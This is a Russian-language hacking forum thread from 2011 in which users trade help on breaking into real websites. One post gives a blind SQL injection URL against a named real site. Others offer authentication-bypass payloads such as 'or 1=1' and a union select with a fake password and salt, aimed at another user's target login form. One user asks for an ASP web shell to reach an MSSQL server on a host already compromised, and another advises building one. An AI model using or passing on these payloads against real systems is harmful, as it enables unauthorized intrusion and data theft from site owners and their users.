 |
|
25.10.2011, 00:27
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от smirk
всем ку)
http://www.uralremstroy.ru/catalog.php?group_id=104
с простыми эксплуатациями sql inj знаком, но как тут вывести кол-во полей ни как не пойму или там вообще нельзя вывести?
Заранее спасибо.
Там 4-ветка, и только блинд
http://www.uralremstroy.ru/catalog.php?group_id=14)+and+substring(version(),1 ,1)=4--+
|
|
|
25.10.2011, 01:26
|
|
Новичок
Регистрация: 31.08.2011
Сообщений: 0
С нами:
7736726
Репутация:
0
|
|
при сканирование сайта Acunetix Web Vulnerability Scanner 7 есть опасная уезвимость
require valid-user
как я понял это уязвимость связана с http и https при постановки https в нужный запрос получаем сертификат безопасности
как эту уязвимость реализовать?
|
|
|
|
25.10.2011, 07:04
|
|
Познающий
Регистрация: 18.12.2010
Сообщений: 35
С нами:
8105366
Репутация:
0
|
|
Не получается раскрутить скуль, при авторизации:
При запросе, т.е. логине
, выскакивает ошибка:
Сообщение от None
MySQL Query fail: SELECT user_pass, user_salt, user_group, user_id FROM `users` WHERE user_name = 'asd
''
При asd' or 1=1--
Сообщение от None
... WHERE user_name = 'asd' or 1=1--'
Но при asd' or '1=1-- ошибка пропадает, и пишется только что не правильный пароль.
Помогите с запросом, уже с or 1=1 как только мог извращался, не пускает |
|
|
|
25.10.2011, 15:41
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами:
8982831
Репутация:
37
|
|
Сообщение от M1lten
Не получается раскрутить скуль, при авторизации:
При запросе, т.е. логине , выскакивает ошибка:
При asd' or 1=1--
Но при asd' or '1=1-- ошибка пропадает, и пишется только что не правильный пароль.
Помогите с запросом, уже с or 1=1 как только мог извращался, не пускает
Действующий ник, например admin' or 1='1
|
|
|
|
25.10.2011, 16:13
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от M1lten
Не получается раскрутить скуль, при авторизации:
При запросе, т.е. логине , выскакивает ошибка:
При asd' or 1=1--
Но при asd' or '1=1-- ошибка пропадает, и пишется только что не правильный пароль.
Помогите с запросом, уже с or 1=1 как только мог извращался, не пускает
что-то типа этого, но так как там соль, то однозначно сказать нельзя, попробуй тем не менее:
asd' union select 'pass', 'salt', 1, '1
логин указываешь asd
пасс pass
|
|
|
|
25.10.2011, 16:32
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами:
8982831
Репутация:
37
|
|
Есть данные для подключения к MSSQL серверу и шелл на серваке, никак не могу подкконектиться к базе, через php не хочет, как я понял нужен asp шелл с поддержкой mssql. поделитесь ктонибудь?
|
|
|
|
25.10.2011, 16:34
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
Сообщение от ZARO
Есть данные для подключения к MSSQL серверу и шелл на серваке, никак не могу подкконектиться к базе, через php не хочет, как я понял нужен asp шелл с поддержкой mssql. поделитесь ктонибудь?
http://www.plus2net.com/asp-tutorial/db-mssqlconn.php
попробуй из этого сделать простенький шелл
|
|
|
|
25.10.2011, 17:07
|
|
Познающий
Регистрация: 18.12.2010
Сообщений: 35
С нами:
8105366
Репутация:
0
|
|
Сообщение от попугай
что-то типа этого, но так как там соль, то однозначно сказать нельзя, попробуй тем не менее:
asd' union select 'pass', 'salt', 1, '1
логин указываешь asd
пасс pass
При таком запросе ошибки от мускуля нет, но в ответ я получаю, что пароль не верный.
|
|
|
|
25.10.2011, 17:15
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от попугай
что-то типа этого, но так как там соль, то однозначно сказать нельзя, попробуй тем не менее:
asd' union select 'pass', 'salt', 1, '1
логин указываешь asd
пасс pass
1' or 1=1 #
И MySQL отдаст всех юзеров, где соблюдается условие 1=1. А соблюдается оно везде.
1' OR 1=1 LIMIT 1 #
Думаю так должно сработать.
|
|
|
|
25.10.2011, 17:26
|
|
Познающий
Регистрация: 18.12.2010
Сообщений: 35
С нами:
8105366
Репутация:
0
|
|
Сообщение от Boolean
1' or 1=1 #
И MySQL отдаст всех юзеров, где соблюдается условие 1=1. А соблюдается оно везде.
1' OR 1=1 LIMIT 1 #
Думаю так должно сработать.
Тоже, ошибки нет, но пишет что не правильный пароль.
Если что, могу кому-то в пм кинуть
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
